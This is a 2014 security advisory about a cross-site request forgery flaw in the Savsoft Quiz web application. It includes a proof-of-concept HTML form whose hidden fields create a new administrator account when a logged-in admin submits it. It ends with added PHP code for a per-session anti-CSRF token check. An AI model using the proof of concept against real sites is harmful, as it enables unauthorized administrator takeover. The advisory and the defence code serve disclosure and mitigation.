Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 24-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352
[+] Vendor:
[+] Friendly Sites:

1.OVERVIEW:
Savsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) vulnerability.

2.Version:
All

3.Background:
Savsoft Quiz is a PHP-based web application for creating and managing online quizzes, tests and exams on your web server or hosting.

4.Proof Of Concept:
<html>
<body>
<form method="POST" name="form0" action="">
<input type="hidden" name="username" value="miuter12"/>
<input type="hidden" name="first_name" value="TUNISIAN"/>
<input type="hidden" name="last_name" value="CYBER"/>
<input type="hidden" name="user_email" value=""/>
<input type="hidden" name="user_password" value="p@assw0rd"/>
<input type="hidden" name="confirm_password" value="p@assw0rd"/>
<input type="hidden" name="user_credit" value="blank"/>
<input type="hidden" name="user_group" value="group1"/>
<input type="submit" value="Click ME!"/>
</form>
</body>
</html>

5.Solution(s):
n/a

6.TIME-LINE:
2014-02-22: Vulnerability was discovered.
2014-02-22: Contact with vendor
2014-02-23: No Reply
2014-02-24: Vulnerability Released

7.Greetings:
Xmax-tn Xtech-set N43il Sec4ver,E4A Members
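
The advisory lists no solution. The following added example, which is not part of the original advisory and is not Savsoft Quiz code, shows a per-session synchronizer-token check that refuses a POST arriving without the session's token, as the form in section 4 would send it. The function names, the csrf_token field and the is_admin session key are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not Savsoft Quiz code): per-session anti-CSRF token.

/** Return the session's token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the POST body carries the token bound to this session. */
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);   // constant-time comparison
}

/** Gate for the add-user action: returns an HTTP status code. */
function handle_add_user(array $session, array $post): int
{
    if (empty($session['is_admin'])) {
        return 401;               // not logged in as an administrator
    }
    if (!csrf_valid($session, $post)) {
        return 403;               // tokenless or wrong-token request: refuse
    }
    // ... validate the fields and create the account here ...
    return 200;
}

// Constructed demo data: an admin session and two of the PoC's field names.
$session = ['is_admin' => true];
$token   = csrf_token($session);  // the real form would emit this as a hidden input
$fields  = ['username' => 'example', 'user_group' => 'group1'];

// Request built from the application's own form: token present.
echo handle_add_user($session, $fields + ['csrf_token' => $token]), "\n";
// Cross-site request: the browser sends the session cookie, but no token.
echo handle_add_user($session, $fields), "\n";
// Cross-site request with a guessed token.
echo handle_add_user($session, $fields + ['csrf_token' => str_repeat('0', 64)]), "\n";
```

Setting the session cookie's SameSite attribute to Lax or Strict adds a second layer, because browsers then withhold the cookie on cross-site POST requests.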
